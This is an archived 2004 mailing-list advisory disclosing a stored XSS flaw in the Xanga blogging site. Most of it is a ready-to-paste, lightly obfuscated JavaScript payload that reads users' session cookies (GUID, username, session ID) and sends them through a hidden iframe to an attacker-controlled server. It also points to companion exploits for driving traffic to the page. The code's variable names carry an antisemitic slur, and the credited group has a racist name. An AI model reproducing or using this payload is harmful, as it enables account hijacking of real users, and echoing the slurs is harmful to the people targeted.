[<prev] [next>] [day] [month] [year] [list]
Message-ID: <affebc6f050101174614ecea28@mail.gmail.com>
From: gerryniger at gmail.com (gnaa/rkz)
Subject: Xanga Cookie Stealing Vunerability XSS - GNAA
Security Center
Vendor: Xanga
URL: http://www.xanga.com/
Versions: Current
Remote: Yes
vendor notified: 06 Oct 2004 at 14:08
Vendor response: NONE
Summary:
~~~~~~~
Xanga is a fully featured blogging system, it
provides great control over look & feel of a users
blog by allowing HTML with only basic checks.
Xanga has well over 2.5 million users and millions
of page views every hour.
A security vulnerability in the current system
allows malicious users to steal session cookies
===================================
Examples Code:
~~~~~~~~~~~~~~~~~~~~~~~~
Pre-reqs:
* Create an Account, this does not require a valid email.
1. Click Look & Feel on the lefthand navigation bar
2. In the "Insert your own HTML" Box enter for following code.
~~~~~~~~~~~~CUT AFTER HERE~~~~~~~~~~~~~~~~~
<script>
var gt = "<";
var e1 = "scr";
var e2 = "ipt";
var lt = ">";
var if1 = "ifr";
var if2 = "ame";
document.write(gt + e1 + e2 + lt);
document.write("var jewsdidwtc = documen");
document.write("t.cook");
document.write("ie.split(\';\');");
document.write("<\/script>");
// WRITE COOKIE TO TOP OF SCREEN.
document.write(jewsdidwtc);
var quot = '"'
// THE FOLLOWING CODE DEMONSTRATES HOW
// TO STEAL THE COOKIE, "SOMESITE" SHOULD
// BE A SITE WHERE YOU CAN TAIL THE LOGS
// OR MAYBE WRITE A SPECIFIC SCRIPT TO
// CAPTURE THE ARGUMENTS PROVIDED
var url = "http://SOMEWEBSITE/";
document.write(gt + if1 + if2);
document.write(" src=" + url + "?guid=");
// --- get guid ---
var GUID = "GUID=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(GUID) == 0) var GUIDval = c.substring(GUID.length,c.length);
}
// --- get username ---
var USER = "u=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(USER) == 0) var USERval = c.substring(USER.length,c.length);
}
// --- get sessionid ---
var SESS = "x=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(SESS) == 0) var SESSval = c.substring(SESS.length,c.length);
}
document.write(GUIDval);
document.write("&u=" + USERval);
document.write("&x=" + SESSval);
document.write(quot);
document.write(" WIDTH=1 HEIGHT=1" + lt);
</script>
~~~~~~~~~~~~END CUT HERE~~~~~~~~~~~~~~~~~
=========================================
Impact:
~~~~~
This code just shows how to steal session cookies, it would
seem that getting hits to a malicious users blog could be quite
hard. This is not the case. When combined with existing Xanga
exploits: 1. http://homepage.ntlworld.com/allencastro/autoreg.gnaa
2. http://homepage.ntlworld.com/allencastro/xanga.gnaa
could potentially generate thousands of hits and even become
featured on Xanga's front page (due to popularity of page).
Meaning the attacker could get thousands of logins in a
few hours.
Vendor:
~~~~~
Vendor was informed months ago but we have recieved no reply.
Credits:
~~~~~
K5 Article on Xanga: http://www.kuro5hin.org/story/2004/12/28/161214/43
The GNAA Security Team: http://www.gnaa.us/
Powered by blists - more mailing lists